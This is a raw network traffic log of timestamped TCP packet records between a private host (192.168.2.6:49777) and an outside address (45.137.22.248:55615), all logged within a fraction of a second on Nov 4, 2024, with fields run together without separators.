                                                        Nov 4, 2024 04:32:14.141021967 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141058922 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141098022 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141108990 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141132116 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141158104 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141204119 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141248941 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141256094 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141299009 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141305923 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141346931 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141374111 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141396999 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141415119 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141464949 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141498089 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141504049 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141524076 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141568899 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141609907 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141614914 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141660929 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141695023 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141726971 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141746998 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141771078 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141801119 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141822100 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141854048 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141861916 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.141880989 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.141938925 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145174026 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145241022 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145431995 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145564079 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145585060 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145591974 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145617008 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145704985 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145711899 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145757914 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145797014 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145831108 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145860910 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145865917 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145908117 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145915031 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145936966 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.145957947 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145989895 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.145992994 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146023035 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146040916 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146063089 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146130085 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146141052 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146152020 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146238089 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146249056 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146264076 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146276951 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146327972 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146354914 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146358013 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146392107 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146434069 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146444082 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146477938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146488905 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146568060 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146579027 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146589994 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146609068 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146647930 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146657944 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146678925 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146682024 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146720886 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146722078 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146769047 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146780014 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146815062 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146825075 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146838903 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146862984 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146903992 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146914959 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146923065 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146930933 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.146953106 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146966934 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146981955 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.146998882 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147001028 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147013903 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147026062 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147053957 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147064924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147090912 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147090912 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147103071 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147114038 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147119999 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147149086 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147159100 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147190094 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147198915 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147202015 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147209883 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147248030 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147258043 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147288084 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147299051 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147309065 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147336006 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147346020 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147393942 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147403955 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147413015 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147418976 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147435904 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147442102 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147444010 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147455931 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147464991 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147476912 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147483110 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147490025 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147495031 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147505999 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147511959 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147516012 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147528887 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147548914 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147567987 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147578001 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147587061 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147602081 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147614002 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147623062 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147633076 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147638083 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147656918 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147666931 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147677898 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147686005 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147710085 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.147722006 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147737026 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147752047 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.147813082 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150021076 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150108099 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150357008 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150357962 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150429964 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150449038 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150466919 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150511026 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150511980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150522947 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150541067 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150568008 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150583029 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150600910 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150660992 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150702000 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150713921 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150748968 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150758982 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150763988 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150794983 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.150846958 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150859118 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150893927 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150903940 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150971889 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.150989056 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151001930 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151020050 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151046038 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151056051 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151067972 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151087999 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151114941 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151125908 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151185036 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151195049 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151200056 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151252031 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151253939 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151271105 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151279926 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151299000 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151314974 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151330948 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151402950 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151415110 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151424885 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151443005 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151463032 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151480913 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151499987 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151501894 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151581049 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151592970 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151602983 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151611090 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151654005 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151665926 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151680946 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151705027 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151738882 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151740074 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151770115 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151781082 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151798964 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151810884 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151835918 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151865959 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151902914 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151937962 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.151968956 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151978970 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.151995897 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152046919 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152091026 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152101040 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152143002 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152242899 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152286053 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152327061 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152338982 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152352095 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152369022 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152394056 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152422905 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152434111 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152518034 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152528048 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152605057 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152626991 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152652979 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152666092 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152672052 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152707100 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152740955 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152775049 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152805090 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152805090 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152837992 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152856112 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152890921 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152915955 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152925968 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152934074 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152941942 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152961016 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.152966976 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.152970076 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153024912 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153033972 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153050900 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153059959 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153069973 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153088093 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153116941 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153130054 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153145075 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153156042 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153167009 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153175116 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153198004 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153198957 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153208971 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153245926 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153255939 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153274059 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153285980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153309107 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153320074 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153325081 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153362036 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153371096 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153403044 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153408051 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153419018 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153455019 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153492928 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153503895 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153527021 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153536081 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153558969 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153567076 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153577089 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153594017 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153598070 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153628111 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153642893 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153677940 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153687954 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153698921 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153717041 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153717041 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153737068 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153769016 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153779030 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153795004 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153810978 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153847933 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153871059 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153881073 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153901100 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153911114 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153919935 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153935909 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153945923 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153971910 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.153989077 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.153990030 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154000998 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154037952 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154078960 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154088974 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154098988 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154128075 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154148102 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154186010 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154187918 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154213905 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154227972 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154256105 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154266119 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154298067 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154301882 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154311895 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154340982 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154351950 CET556154977745.137.22.248192.168.2.6
